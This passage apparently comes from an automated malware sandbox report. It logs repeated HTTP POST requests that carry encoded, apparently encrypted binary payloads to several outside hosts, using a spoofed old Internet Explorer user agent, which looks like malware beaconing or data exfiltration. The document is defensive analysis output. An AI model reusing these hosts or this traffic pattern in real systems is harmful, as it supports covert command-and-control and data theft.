1z+41WpsP5onMQp2TbAz7S3RVCOaXC1zPsXTOzPJUNLESA73m/PPUtu5ARxp8wYzsO91Ea28he82JM8lyUShL8N4P+5csQt0J7Rju7TIi+W76af+ljj7IXPCSOJPUIopcAygKMrXaOx0askoJSuqC2Y2p1dVQhw12Elxb2vLcgmg/EzuhnqqJasdBMJvVerV67OHrd6nLG5PvQSt5WPF4SWV7LkJZVajkqNfrrKSEIFhQLeAF6tf6CLVMdj15Y5krefgVH2vvfntLB5ciP75zuHKLCUdnBUqz+6UqX4Ste2JJ5QfQfasSbB4j9w7QJYeGsQfF+RvifZ2txnuzMYV6VdkWjP1AQpX6ukBzrD1JPOWtDs2DcJjHjHjBSR2okfRtGUa+bAjQXHEAM05HBQkfWBA+n47bGxcuMJ4oBXsXyfznJSFKuWdJ7SYyfuLTHPMZY2O7rkIc0h9y21o2dCNYZZo9y68nVnNy+7OUT8qMsWQQRtSVK9hCnIsjjuPKhdJNMAcj7EUqxz0HDF9UAl4LKRyvjpetZjrMqnpW5jR5XvpJkN4gHIY
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 61 73 55 6f 6f 6d 62 64 6e 64 4a 4e 6e 44 4a 2f 41 64 57 66 63 34 6e 37 5a 36 56 47 70 32 70 75 2b 6d 64 67 70 48 45 42 38 36 38 73 63 41 79 73 74 56 68 6c 38 4c 4d 64 50 64 35 4d 62 68 50 59 4a 30 46 55 45 43 61 5a 65 67 37 4e 35 2b 64 48 4a 71 66 59 38 38 30 45 39 2b 38 4f 63 42 4b 59 6d 4c 41 44 33 31 66 4b 68 38 64 58 57 4a 54 36 65 77 78 55 72 31 48 75 36 61 72 48 6f 54 43 65 2f 4f 46 4f 58 4b 33 61 73 6f 34 61 79 53 66 73 6b 53 50 36 37 34 73 70 2b 30 32 6c 32 44 36 66 35 52 61 38 6b 52 45 44 37 61 61 38 5a 31 77 64 65 69 62 33 62 63 49 32 73 53 7a 6d 62 65 2f 35 75 38 4e 4c 4d 70 30 2b 4b 77 34 76 39 61 4e 75 4d 67 5a 6f 50 30 38 4d 36 63 56 62 2b 34 47 61 69 58 41 2b 39 5a 6e 74 4f 63 76 72 46 50 65 70 37 38 75 6b 6b 63 58 44 47 49 7a 2f 53 45 31 76 5a 33 57 4d 49 33 36 51 50 33 6b 46 66 45 38 39 71 4b 69 2f 68 69 33 62 75 47 59 52 75 70 51 4e 4d 59 70 49 32 47 6f 6f 66 78 38 38 2f 39 33 50 75 68 6e 66 4f 45 77 4a 6e 6e 70 41 44 77 49 4b 62 75 70 77 6e 71 6f 4e 64 39 32 7a 61 42 77 7a 52 6e 4b 4e 6e 75 6f 64 2f 57 55 69 79 71 72 51 2f 51 68 4b 63 4e 74 63 43 6e 2f 54 63 6f 43 48 37 48 59 51 46 63 73 76 37 36 78 48 61 2f 36 2b 33 4e 63 77 2f 49 45 6f 61 41 30 54 6c 4a 4c 41 54 6f 76 6c 61 68 68 62 57 66 30 50 69 45 74 58 79 72 49 73 54 5a 6c 43 41 46 61 74 46 4f 76 36 54 47 47 42 78 51 31 46 66 71 57 77 45 47 68 70 65 69 2b 45 2b 41 4a 51 46 6f 6e 34 77 51 57 63 62 57 6a 38 30 35 4d 4e 2b 78 4f 50 6b 4d 6b 57 79 43 59 54 74 74 41 69 69 78 53 61 68 6f 68 66 76 39 6b 55 32 53 78 6e 2f 54 51 6e 72 2f 53 32 70 75 4f 49 35 78 64 55 72 76 52 45 31 72 59 6e 79 59 32 2f 4e 71 6f 74 35 35 42 43 5a 6e 31 73 56 5a 4e 34 32 76 32 46 70 35 54 4c 66 2b 34 69 55 69 72 48 50 49 4d 4e 50 49 4f 32 2b 2f 57 57 62 45 56 6a 59 4a 76 68 44 73 36 39 Data Ascii: asUoombdndJNnDJ/AdWfc4n7Z6VGp2pu+mdgpHEB868scAystVhl8LMdPd5MbhPYJ0FUECaZeg7N5+dHJqfY880E9+8OcBKYmLAD31fKh8dXWJT6ewxUr1Hu6arHoTCe/OFOXK3aso4aySfskSP674sp+02l2D6f5Ra8kRED7aa8Z1wdeib3bcI2sSzmbe/5u8NLMp0+Kw4v9aNuMgZoP08M6cVb+4GaiXA+9ZntOcvrFPep78ukkcXDGIz/SE1vZ3WMI36QP3kFfE89qKi/hi3buGYRupQNMYpI2Goofx88/93PuhnfOEwJnnpADwIKbupwnqoNd92zaBwzRnKNnuod/WUiyqrQ/QhKcNtcCn/TcoCH7HYQFcsv76xHa/6+3Ncw/IEoaA0TlJLATovlahhbWf0PiEtXyrIsTZlCAFatFOv6TGGBxQ1FfqWwEGhpei+E+AJQFon4wQWcbWj805MN+xOPkMkWyCYTttAiixSahohfv9kU2Sxn/TQnr/S2puOI5xdUrvRE1rYnyY2/Nqot55BCZn1sVZN42v2Fp5TLf+4iUirHPIMNPIO2+/WWbEVjYJvhDs69
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.gpthink.comCache-Control: no-cacheData Raw: 44 5a 77 37 6c 58 33 52 58 39 43 36 78 51 66 62 4e 47 54 35 63 37 5a 69 4d 6c 53 72 72 6d 55 48 41 57 4a 62 6b 46 63 57 37 2f 55 66 41 68 73 74 4b 44 45 43 68 4c 4b 6f 67 55 49 56 2b 63 2b 41 58 4e 6f 35 34 52 6b 4a 38 49 6c 68 2b 78 6f 2b 34 47 43 69 6f 77 6d 65 54 36 45 32 38 74 46 45 71 75 71 74 66 64 68 6a 6b 57 4b 49 79 74 2b 43 45 6a 77 6c 4b 54 47 52 2f 51 36 77 71 46 4d 53 34 67 45 4f 44 48 55 41 35 53 34 4c 6d 33 58 48 78 78 76 6e 75 6a 72 2b 49 76 61 67 77 63 41 39 74 39 41 6a 53 42 56 4d 6a 33 74 44 4a 36 4a 2f 77 52 73 64 31 44 75 33 36 4a 65 47 31 2b 51 64 57 75 2b 44 52 61 55 34 66 34 34 77 2b 4d 4c 49 7a 38 58 35 59 57 6f 4a 78 76 70 52 6d 6d 61 48 6f 5a 2f 77 69 61 79 33 58 63 55 79 35 45 59 43 32 42 68 70 6e 4f 71 42 52 71 55 34 72 77 32 77 44 6c 6a 45 67 68 4d 57 79 2b 37 43 31 42 68 67 31 42 64 51 5a 2b 74 58 52 73 50 2b 77 6c 4a 7a 62 57 4e 57 59 36 4f 4c 6d 43 2b 71 52 58 54 61 4f 41 53 6e 41 6d 6b 52 52 50 4b 79 4e 4e 38 2f 64 4c 70 56 41 48 37 79 4a 68 58 47 31 73 2f 33 51 56 48 34 66 33 75 4d 55 37 61 51 5a 48 67 4b 4c 4b 4c 77 4a 71 6c 56 5a 61 59 34 2b 48 43 4f 36 36 5a 63 52 35 66 44 68 44 6b 56 45 64 38 4e 6d 48 57 70 68 76 5a 63 69 38 36 57 32 31 61 6f 73 48 50 65 46 4e 39 78 75 71 59 75 44 4a 45 76 66 34 4a 4e 5a 75 7a 2f 78 72 76 4f 6c 47 61 6b 47 71 67 4e 52 50 67 2f 76 79 38 43 75 44 78 35 73 34 41 48 30 4f 41 33 4e 63 31 38 71 76 69 54 43 69 59 76 44 35 6f 56 39 46 44 57 63 45 78 6d 4d 49 7a 57 73 35 38 59 4b 37 62 66 4c 2f 35 4a 78 33 51 74 31 48 54 59 50 4b 36 2f 30 59 64 43 44 55 48 7a 57 68 35 4b 6d 56 2f 6d 57 42 35 33 49 6f 51 74 38 30 77 70 36 36 78 62 58 64 52 6d 68 58 6b 64 4d 43 59 54 61 6e 71 75 4d 51 3d 3d Data Ascii: DZw7lX3RX9C6xQfbNGT5c7ZiMlSrrmUHAWJbkFcW7/UfAhstKDEChLKogUIV+c+AXNo54RkJ8Ilh+xo+4GCiowmeT6E28tFEquqtfdhjkWKIyt+CEjwlKTGR/Q6wqFMS4gEODHUA5S4Lm3XHxxvnujr+IvagwcA9t9AjSBVMj3tDJ6J/wRsd1Du36JeG1+QdWu+DRaU4f44w+MLIz8X5YWoJxvpRmmaHoZ/wiay3XcUy5EYC2BhpnOqBRqU4rw2wDljEghMWy+7C1Bhg1BdQZ+tXRsP+wlJzbWNWY6OLmC+qRXTaOASnAmkRRPKyNN8/dLpVAH7yJhXG1s/3QVH4f3uMU7aQZHgKLKLwJqlVZaY4+HCO66ZcR5fDhDkVEd8NmHWphvZci86W21aosHPeFN9xuqYuDJEvf4JNZuz/xrvOlGakGqgNRPg/vy8CuDx5s4AH0OA3Nc18qviTCiYvD5oV9FDWcExmMIzWs58YK7bfL/5Jx3Qt1HTYPK6/0YdCDUHzWh5KmV/mWB53IoQt80wp66xbXdRmhXkdMCYTanquMQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 37 67 49 32 59 59 31 54 4d 35 6f 4a 6d 43 66 6f 42 46 38 5a 72 55 62 2f 45 48 66 37 63 53 58 4a 45 55 55 55 78 56 4b 70 37 6f 77 49 7a 69 68 71 37 61 51 44 2b 34 6a 49 4f 72 64 6f 72 41 46 63 6d 6b 50 46 41 4b 69 72 63 52 4e 49 4f 4c 79 32 37 7a 55 56 34 66 67 68 36 76 52 6b 41 6c 46 41 30 56 2b 68 6a 43 7a 57 6f 2b 4a 51 43 56 67 4a 6d 70 2f 4b 67 4e 4d 70 79 58 74 47 78 59 43 46 32 66 33 6c 4a 30 47 76 63 48 4a 52 6a 4d 33 6f 77 78 71 63 62 49 75 57 47 4d 70 6b 55 6c 76 6d 6f 31 6b 51 56 57 61 57 30 63 66 55 73 30 2f 78 70 71 34 56 64 77 4c 61 4e 33 4c 65 75 79 43 58 30 2f 62 63 2f 55 57 2f 39 52 48 4e 6d 5a 4b 79 70 46 33 35 4e 47 64 67 59 75 32 75 2f 4b 45 67 42 34 4f 62 74 4e 57 65 4e 41 63 70 74 49 69 63 64 67 64 75 72 7a 50 73 41 78 6d 50 4c 75 53 77 2f 61 31 66 72 76 46 6d 37 72 58 74 4a 75 5a 45 48 75 64 48 47 73 38 62 73 69 44 6e 4d 2f 4e 39 4c 37 30 62 43 63 72 58 75 36 6f 59 31 6b 45 6a 6a 44 53 34 36 37 64 6c 52 32 70 67 70 4a 34 75 6f 41 59 48 73 4b 73 2b 77 31 43 7a 46 50 58 4a 67 33 77 4b 49 6d 59 79 68 45 69 44 6d 51 72 2b 7a 37 52 67 34 4a 52 70 75 34 36 55 77 74 56 64 6a 52 4c 52 66 7a 4d 76 43 55 4f 49 61 36 45 45 53 47 4a 6c 58 6a 67 36 49 33 38 50 4a 7a 4c 4a 38 41 35 72 4e 42 69 6b 71 78 2b 31 55 35 34 4d 32 6c 39 4d 70 34 47 53 33 43 63 33 70 61 74 42 63 78 36 31 31 6c 79 32 63 75 52 72 57 6e 4c 43 68 72 4f 39 37 49 76 58 67 6f 49 56 6c 37 30 6d 63 75 74 6c 36 38 47 57 5a 49 65 58 45 4f 5a 4a 58 6b 53 4f 50 32 78 66 39 2b 54 74 4c 58 56 42 7a 2f 74 35 47 2b 36 79 38 39 50 2f 45 64 42 2f 64 37 33 2b 78 30 33 70 72 78 78 33 69 66 79 74 2f 4e 2b 54 62 4e 68 69 71 39 52 6f 39 39 30 36 37 5a 72 70 6e 44 6f 64 4a 6d 36 51 63 75 6a 6e 39 6d 61 37 4c 65 74 4b 66 5a 41 78 36 72 6e 75 41 61 55 3d Data Ascii: 7gI2YY1TM5oJmCfoBF8ZrUb/EHf7cSXJEUUUxVKp7owIzihq7aQD+4jIOrdorAFcmkPFAKircRNIOLy27zUV4fgh6vRkAlFA0V+hjCzWo+JQCVgJmp/KgNMpyXtGxYCF2f3lJ0GvcHJRjM3owxqcbIuWGMpkUlvmo1kQVWaW0cfUs0/xpq4VdwLaN3LeuyCX0/bc/UW/9RHNmZKypF35NGdgYu2u/KEgB4ObtNWeNAcptIicdgdurzPsAxmPLuSw/a1frvFm7rXtJuZEHudHGs8bsiDnM/N9L70bCcrXu6oY1kEjjDS467dlR2pgpJ4uoAYHsKs+w1CzFPXJg3wKImYyhEiDmQr+z7Rg4JRpu46UwtVdjRLRfzMvCUOIa6EESGJlXjg6I38PJzLJ8A5rNBikqx+1U54M2l9Mp4GS3Cc3patBcx611ly2cuRrWnLChrO97IvXgoIVl70mcutl68GWZIeXEOZJXkSOP2xf9+TtLXVBz/t5G+6y89P/EdB/d73+x03prxx3ifyt/N+TbNhiq9Ro99067ZrpnDodJm6Qcujn9ma7LetKfZAx6rnuAaU=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 31 7a 2b 34 31 57 70 73 50 35 6f 6e 4d 51 70 32 54 62 41 7a 37 53 33 52 56 43 4f 61 58 43 31 7a 50 73 58 54 4f 7a 50 4a 55 4e 4c 45 53 41 37 33 6d 2f 50 50 55 74 75 35 41 52 78 70 38 77 59 7a 73 4f 39 31 45 61 32 38 68 65 38 32 4a 4d 38 6c 79 55 53 68 4c 38 4e 34 50 2b 35 63 73 51 74 30 4a 37 52 6a 75 37 54 49 69 2b 57 37 36 61 66 2b 6c 6a 6a 37 49 58 50 43 53 4f 4a 50 55 49 6f 70 63 41 79 67 4b 4d 72 58 61 4f 78 30 61 73 6b 6f 4a 53 75 71 43 32 59 32 70 31 64 56 51 68 77 31 32 45 6c 78 62 32 76 4c 63 67 6d 67 2f 45 7a 75 68 6e 71 71 4a 61 73 64 42 4d 4a 76 56 65 72 56 36 37 4f 48 72 64 36 6e 4c 47 35 50 76 51 53 74 35 57 50 46 34 53 57 56 37 4c 6b 4a 5a 56 61 6a 6b 71 4e 66 72 72 4b 53 45 49 46 68 51 4c 65 41 46 36 74 66 36 43 4c 56 4d 64 6a 31 35 59 35 6b 72 65 66 67 56 48 32 76 76 66 6e 74 4c 42 35 63 69 50 37 35 7a 75 48 4b 4c 43 55 64 6e 42 55 71 7a 2b 36 55 71 58 34 53 74 65 32 4a 4a 35 51 66 51 66 61 73 53 62 42 34 6a 39 77 37 51 4a 59 65 47 73 51 66 46 2b 52 76 69 66 5a 32 74 78 6e 75 7a 4d 59 56 36 56 64 6b 57 6a 50 31 41 51 70 58 36 75 6b 42 7a 72 44 31 4a 50 4f 57 74 44 73 32 44 63 4a 6a 48 6a 48 6a 42 53 52 32 6f 6b 66 52 74 47 55 61 2b 62 41 6a 51 58 48 45 41 4d 30 35 48 42 51 6b 66 57 42 41 2b 6e 34 37 62 47 78 63 75 4d 4a 34 6f 42 58 73 58 79 66 7a 6e 4a 53 46 4b 75 57 64 4a 37 53 59 79 66 75 4c 54 48 50 4d 5a 59 32 4f 37 72 6b 49 63 30 68 39 79 32 31 6f 32 64 43 4e 59 5a 5a 6f 39 79 36 38 6e 56 6e 4e 79 2b 37 4f 55 54 38 71 4d 73 57 51 51 52 74 53 56 4b 39 68 43 6e 49 73 6a 6a 75 50 4b 68 64 4a 4e 4d 41 63 6a 37 45 55 71 78 7a 30 48 44 46 39 55 41 6c 34 4c 4b 52 79 76 6a 70 65 74 5a 6a 72 4d 71 6e 70 57 35 6a 52 35 58 76 70 4a 6b 4e 34 67 48 49 59 Data Ascii: 1z+41WpsP5onMQp2TbAz7S3RVCOaXC1zPsXTOzPJUNLESA73m/PPUtu5ARxp8wYzsO91Ea28he82JM8lyUShL8N4P+5csQt0J7Rju7TIi+W76af+ljj7IXPCSOJPUIopcAygKMrXaOx0askoJSuqC2Y2p1dVQhw12Elxb2vLcgmg/EzuhnqqJasdBMJvVerV67OHrd6nLG5PvQSt5WPF4SWV7LkJZVajkqNfrrKSEIFhQLeAF6tf6CLVMdj15Y5krefgVH2vvfntLB5ciP75zuHKLCUdnBUqz+6UqX4Ste2JJ5QfQfasSbB4j9w7QJYeGsQfF+RvifZ2txnuzMYV6VdkWjP1AQpX6ukBzrD1JPOWtDs2DcJjHjHjBSR2okfRtGUa+bAjQXHEAM05HBQkfWBA+n47bGxcuMJ4oBXsXyfznJSFKuWdJ7SYyfuLTHPMZY2O7rkIc0h9y21o2dCNYZZo9y68nVnNy+7OUT8qMsWQQRtSVK9hCnIsjjuPKhdJNMAcj7EUqxz0HDF9UAl4LKRyvjpetZjrMqnpW5jR5XvpJkN4gHIY
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 31 7a 2b 34 31 57 70 73 50 35 6f 6e 4d 51 70 32 54 62 41 7a 37 53 33 52 56 43 4f 61 58 43 31 7a 50 73 58 54 4f 7a 50 4a 55 4e 4c 45 53 41 37 33 6d 2f 50 50 55 74 75 35 41 52 78 70 38 77 59 7a 73 4f 39 31 45 61 32 38 68 65 38 32 4a 4d 38 6c 79 55 53 68 4c 38 4e 34 50 2b 35 63 73 51 74 30 4a 37 52 6a 75 37 54 49 69 2b 57 37 36 61 66 2b 6c 6a 6a 37 49 58 50 43 53 4f 4a 50 55 49 6f 70 63 41 79 67 4b 4d 72 58 61 4f 78 30 61 73 6b 6f 4a 53 75 71 43 32 59 32 70 31 64 56 51 68 77 31 32 45 6c 78 62 32 76 4c 63 67 6d 67 2f 45 7a 75 68 6e 71 71 4a 61 73 64 42 4d 4a 76 56 65 72 56 36 37 4f 48 72 64 36 6e 4c 47 35 50 76 51 53 74 35 57 50 46 34 53 57 56 37 4c 6b 4a 5a 56 61 6a 6b 71 4e 66 72 72 4b 53 45 49 46 68 51 4c 65 41 46 36 74 66 36 43 4c 56 4d 64 6a 31 35 59 35 6b 72 65 66 67 56 48 32 76 76 66 6e 74 4c 42 35 63 69 50 37 35 7a 75 48 4b 4c 43 55 64 6e 42 55 71 7a 2b 36 55 71 58 34 53 74 65 32 4a 4a 35 51 66 51 66 61 73 53 62 42 34 6a 39 77 37 51 4a 59 65 47 73 51 66 46 2b 52 76 69 66 5a 32 74 78 6e 75 7a 4d 59 56 36 56 64 6b 57 6a 50 31 41 51 70 58 36 75 6b 42 7a 72 44 31 4a 50 4f 57 74 44 73 32 44 63 4a 6a 48 6a 48 6a 42 53 52 32 6f 6b 66 52 74 47 55 61 2b 62 41 6a 51 58 48 45 41 4d 30 35 48 42 51 6b 66 57 42 41 2b 6e 34 37 62 47 78 63 75 4d 4a 34 6f 42 58 73 58 79 66 7a 6e 4a 53 46 4b 75 57 64 4a 37 53 59 79 66 75 4c 54 48 50 4d 5a 59 32 4f 37 72 6b 49 63 30 68 39 79 32 31 6f 32 64 43 4e 59 5a 5a 6f 39 79 36 38 6e 56 6e 4e 79 2b 37 4f 55 54 38 71 4d 73 57 51 51 52 74 53 56 4b 39 68 43 6e 49 73 6a 6a 75 50 4b 68 64 4a 4e 4d 41 63 6a 37 45 55 71 78 7a 30 48 44 46 39 55 41 6c 34 4c 4b 52 79 76 6a 70 65 74 5a 6a 72 4d 71 6e 70 57 35 6a 52 35 58 76 70 4a 6b 4e 34 67 48 49 59 Data Ascii: 1z+41WpsP5onMQp2TbAz7S3RVCOaXC1zPsXTOzPJUNLESA73m/PPUtu5ARxp8wYzsO91Ea28he82JM8lyUShL8N4P+5csQt0J7Rju7TIi+W76af+ljj7IXPCSOJPUIopcAygKMrXaOx0askoJSuqC2Y2p1dVQhw12Elxb2vLcgmg/EzuhnqqJasdBMJvVerV67OHrd6nLG5PvQSt5WPF4SWV7LkJZVajkqNfrrKSEIFhQLeAF6tf6CLVMdj15Y5krefgVH2vvfntLB5ciP75zuHKLCUdnBUqz+6UqX4Ste2JJ5QfQfasSbB4j9w7QJYeGsQfF+RvifZ2txnuzMYV6VdkWjP1AQpX6ukBzrD1JPOWtDs2DcJjHjHjBSR2okfRtGUa+bAjQXHEAM05HBQkfWBA+n47bGxcuMJ4oBXsXyfznJSFKuWdJ7SYyfuLTHPMZY2O7rkIc0h9y21o2dCNYZZo9y68nVnNy+7OUT8qMsWQQRtSVK9hCnIsjjuPKhdJNMAcj7EUqxz0HDF9UAl4LKRyvjpetZjrMqnpW5jR5XvpJkN4gHIY
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 31 7a 2b 34 31 57 70 73 50 35 6f 6e 4d 51 70 32 54 62 41 7a 37 53 33 52 56 43 4f 61 58 43 31 7a 50 73 58 54 4f 7a 50 4a 55 4e 4c 45 53 41 37 33 6d 2f 50 50 55 74 75 35 41 52 78 70 38 77 59 7a 73 4f 39 31 45 61 32 38 68 65 38 32 4a 4d 38 6c 79 55 53 68 4c 38 4e 34 50 2b 35 63 73 51 74 30 4a 37 52 6a 75 37 54 49 69 2b 57 37 36 61 66 2b 6c 6a 6a 37 49 58 50 43 53 4f 4a 50 55 49 6f 70 63 41 79 67 4b 4d 72 58 61 4f 78 30 61 73 6b 6f 4a 53 75 71 43 32 59 32 70 31 64 56 51 68 77 31 32 45 6c 78 62 32 76 4c 63 67 6d 67 2f 45 7a 75 68 6e 71 71 4a 61 73 64 42 4d 4a 76 56 65 72 56 36 37 4f 48 72 64 36 6e 4c 47 35 50 76 51 53 74 35 57 50 46 34 53 57 56 37 4c 6b 4a 5a 56 61 6a 6b 71 4e 66 72 72 4b 53 45 49 46 68 51 4c 65 41 46 36 74 66 36 43 4c 56 4d 64 6a 31 35 59 35 6b 72 65 66 67 56 48 32 76 76 66 6e 74 4c 42 35 63 69 50 37 35 7a 75 48 4b 4c 43 55 64 6e 42 55 71 7a 2b 36 55 71 58 34 53 74 65 32 4a 4a 35 51 66 51 66 61 73 53 62 42 34 6a 39 77 37 51 4a 59 65 47 73 51 66 46 2b 52 76 69 66 5a 32 74 78 6e 75 7a 4d 59 56 36 56 64 6b 57 6a 50 31 41 51 70 58 36 75 6b 42 7a 72 44 31 4a 50 4f 57 74 44 73 32 44 63 4a 6a 48 6a 48 6a 42 53 52 32 6f 6b 66 52 74 47 55 61 2b 62 41 6a 51 58 48 45 41 4d 30 35 48 42 51 6b 66 57 42 41 2b 6e 34 37 62 47 78 63 75 4d 4a 34 6f 42 58 73 58 79 66 7a 6e 4a 53 46 4b 75 57 64 4a 37 53 59 79 66 75 4c 54 48 50 4d 5a 59 32 4f 37 72 6b 49 63 30 68 39 79 32 31 6f 32 64 43 4e 59 5a 5a 6f 39 79 36 38 6e 56 6e 4e 79 2b 37 4f 55 54 38 71 4d 73 57 51 51 52 74 53 56 4b 39 68 43 6e 49 73 6a 6a 75 50 4b 68 64 4a 4e 4d 41 63 6a 37 45 55 71 78 7a 30 48 44 46 39 55 41 6c 34 4c 4b 52 79 76 6a 70 65 74 5a 6a 72 4d 71 6e 70 57 35 6a 52 35 58 76 70 4a 6b 4e 34 67 48 49 59 Data Ascii: 1z+41WpsP5onMQp2TbAz7S3RVCOaXC1zPsXTOzPJUNLESA73m/PPUtu5ARxp8wYzsO91Ea28he82JM8lyUShL8N4P+5csQt0J7Rju7TIi+W76af+ljj7IXPCSOJPUIopcAygKMrXaOx0askoJSuqC2Y2p1dVQhw12Elxb2vLcgmg/EzuhnqqJasdBMJvVerV67OHrd6nLG5PvQSt5WPF4SWV7LkJZVajkqNfrrKSEIFhQLeAF6tf6CLVMdj15Y5krefgVH2vvfntLB5ciP75zuHKLCUdnBUqz+6UqX4Ste2JJ5QfQfasSbB4j9w7QJYeGsQfF+RvifZ2txnuzMYV6VdkWjP1AQpX6ukBzrD1JPOWtDs2DcJjHjHjBSR2okfRtGUa+bAjQXHEAM05HBQkfWBA+n47bGxcuMJ4oBXsXyfznJSFKuWdJ7SYyfuLTHPMZY2O7rkIc0h9y21o2dCNYZZo9y68nVnNy+7OUT8qMsWQQRtSVK9hCnIsjjuPKhdJNMAcj7EUqxz0HDF9UAl4LKRyvjpetZjrMqnpW5jR5XvpJkN4gHIY
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 6f 6e 2b 62 59 69 6c 66 4d 35 71 2f 6f 52 43 6a 2b 42 37 32 30 30 4b 31 5a 41 6e 48 6d 78 75 39 62 5a 78 52 79 41 32 36 5a 75 65 74 34 77 65 6a 65 48 42 4c 66 33 72 6f 79 59 68 30 2f 50 6e 34 4e 6a 54 46 70 6c 6d 70 4e 54 7a 78 70 6f 77 6a 43 50 75 4a 77 2f 53 48 74 52 53 47 4b 75 5a 36 71 57 4b 47 48 50 47 5a 72 41 4a 6f 6b 73 53 67 4d 2b 72 44 50 77 61 58 58 2f 6f 65 42 67 62 4a 38 39 43 77 62 5a 30 30 4b 35 79 6a 4e 59 6a 58 37 4c 4d 35 33 57 52 4b 33 71 67 69 47 4b 79 32 77 4c 6d 38 63 55 4b 31 57 38 44 31 39 73 43 32 44 33 64 78 66 56 49 6f 74 33 35 79 4f 49 7a 54 63 67 5a 63 6f 31 69 72 6e 61 2f 62 6e 64 52 59 57 76 76 68 62 38 56 59 6a 6b 52 44 61 52 64 7a 5a 4b 6b 64 59 65 41 51 52 48 31 42 6d 30 45 4d 77 38 4a 63 66 6f 65 74 76 50 5a 7a 43 62 61 62 43 35 41 56 57 47 4c 42 4c 6e 6b 6c 57 4c 75 6d 74 66 76 6a 63 44 73 57 63 7a 61 79 39 68 62 46 4d 76 45 72 4f 37 6f 31 6f 4b 57 30 78 74 4d 79 61 42 6f 79 32 45 43 65 76 6e 77 50 63 79 45 66 4e 7a 63 6f 67 6a 4e 69 70 79 50 7a 50 4a 4f 38 45 45 4e 4c 73 46 62 78 61 54 6c 68 4a 6c 71 6d 53 58 41 32 79 6d 30 51 39 2f 30 43 69 68 30 6c 72 46 4d 68 70 6d 4c 6f 44 2f 4b 49 64 75 61 6c 6d 71 76 53 36 57 5a 74 68 76 63 66 71 48 31 48 6b 59 5a 45 69 58 6f 75 36 2f 69 64 5a 35 30 4d 44 57 50 52 72 72 38 4e 2b 31 77 2b 71 77 31 56 2b 41 30 33 64 38 57 35 64 49 4b 4c 6e 57 42 33 61 43 48 5a 6e 58 66 6e 59 4b 58 37 2f 6a 71 4e 46 35 32 31 53 55 71 37 6b 49 58 67 7a 64 6a 64 58 64 65 5a 5a 64 48 68 79 59 56 57 54 74 64 45 4b 6f 54 48 6b 43 4f 71 6f 47 2b 6a 45 65 33 4d 59 4f 78 71 43 32 6d 74 4c 4f 4a 79 6d 59 4e 4c 4d 41 78 67 70 4b 34 4d 45 6b 6b 76 66 6b 73 77 34 73 55 30 57 41 3d 3d Data Ascii: on+bYilfM5q/oRCj+B7200K1ZAnHmxu9bZxRyA26Zuet4wejeHBLf3royYh0/Pn4NjTFplmpNTzxpowjCPuJw/SHtRSGKuZ6qWKGHPGZrAJoksSgM+rDPwaXX/oeBgbJ89CwbZ00K5yjNYjX7LM53WRK3qgiGKy2wLm8cUK1W8D19sC2D3dxfVIot35yOIzTcgZco1irna/bndRYWvvhb8VYjkRDaRdzZKkdYeAQRH1Bm0EMw8JcfoetvPZzCbabC5AVWGLBLnklWLumtfvjcDsWczay9hbFMvErO7o1oKW0xtMyaBoy2ECevnwPcyEfNzcogjNipyPzPJO8EENLsFbxaTlhJlqmSXA2ym0Q9/0Cih0lrFMhpmLoD/KIdualmqvS6WZthvcfqH1HkYZEiXou6/idZ50MDWPRrr8N+1w+qw1V+A03d8W5dIKLnWB3aCHZnXfnYKX7/jqNF521SUq7kIXgzdjdXdeZZdHhyYVWTtdEKoTHkCOqoG+jEe3MYOxqC2mtLOJymYNLMAxgpK4MEkkvfksw4sU0WA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 31 7a 2b 34 31 57 70 73 50 35 6f 6e 4d 51 70 32 54 62 41 7a 37 53 33 52 56 43 4f 61 58 43 31 7a 50 73 58 54 4f 7a 50 4a 55 4e 4c 45 53 41 37 33 6d 2f 50 50 55 74 75 35 41 52 78 70 38 77 59 7a 73 4f 39 31 45 61 32 38 68 65 38 32 4a 4d 38 6c 79 55 53 68 4c 38 4e 34 50 2b 35 63 73 51 74 30 4a 37 52 6a 75 37 54 49 69 2b 57 37 36 61 66 2b 6c 6a 6a 37 49 58 50 43 53 4f 4a 50 55 49 6f 70 63 41 79 67 4b 4d 72 58 61 4f 78 30 61 73 6b 6f 4a 53 75 71 43 32 59 32 70 31 64 56 51 68 77 31 32 45 6c 78 62 32 76 4c 63 67 6d 67 2f 45 7a 75 68 6e 71 71 4a 61 73 64 42 4d 4a 76 56 65 72 56 36 37 4f 48 72 64 36 6e 4c 47 35 50 76 51 53 74 35 57 50 46 34 53 57 56 37 4c 6b 4a 5a 56 61 6a 6b 71 4e 66 72 72 4b 53 45 49 46 68 51 4c 65 41 